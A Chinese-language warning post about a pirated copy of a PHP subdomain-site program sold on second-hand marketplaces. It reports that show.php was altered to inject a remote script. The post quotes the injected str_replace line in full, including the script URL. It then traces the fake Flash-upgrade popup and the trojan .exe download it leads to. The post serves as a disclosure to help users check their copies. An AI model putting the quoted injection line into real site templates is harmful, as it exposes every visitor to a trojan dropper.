警惕：盗版“科普一下”泛二级程序强制加载JS木马

据悉，因盗版“科普一下”泛二级程序疑似强制加载JS木马，此事件已导致程序作者“新程序已上线”心态爆裂，解散QQ群，并停止更新程序。

诱因是因为程序作者还没发布，盗版已经漫天飞舞，在各大二手交易平台肆意传播。

人作者只卖1000u，而盗版份子却卖5000u，割韭菜飞起，导致程序作者“新程序已上线”心里不平衡，灰心丧气后无意更新程序，无意继续带大家学习php。

特别提示

本站发布程序已经过“新程序已上线”本人授权，无偿提供给各位爱学习的网友，本地断网学习php语言。

通过本地调试，我们可以学习到如何使用php进行调用根目录下指定文件夹内随机文本文件的随机行，以及在线获取某个html页面标题、内容的方式，充分体悟到php语言的独特魅力。

后门变木马

据热心网友消息：在某鱼上购买的“科普一下”泛二级程序的show.php中，第647行，添加了：

$moban = str_replace( "</html>", "\r\n</html><!--新程序-->\r\n<script type=\"text/javascript\" src=\"https://www.flash-zh.com/flash.js\" charset=\"UTF-8\"></script>",$moban);

如下图所示：

该域名网站标题为“Flash官网-Flash Player下载 _Flash中心_重橙网络”，明显意思盗版flash网站。

且该域名注册时间为：2023年3月15日，明显就是新注册的。

经过测试测试发现：当html页面加载该JS时，会弹出窗口告知你需要立刻升级flash

如果你点击“立刻升级”，则会跳转至网站：https://down.flashs.one/download/

但显然该网站是：2023年3月23日新注册的

当我们点击下载，它会下载：flashcenter_pp_ax_install_cn.exe这个文件

为安全起见，将该文件上传至服务器测试，立刻报毒。

后面我们还尝试进行了安装测试，由于略感恐怖，操作到一般直接关闭所有进程，全盘查杀。

后且对该文件进行了木马云查杀，确信的确就是木马文件！

所以说大家赶紧排查一下吧！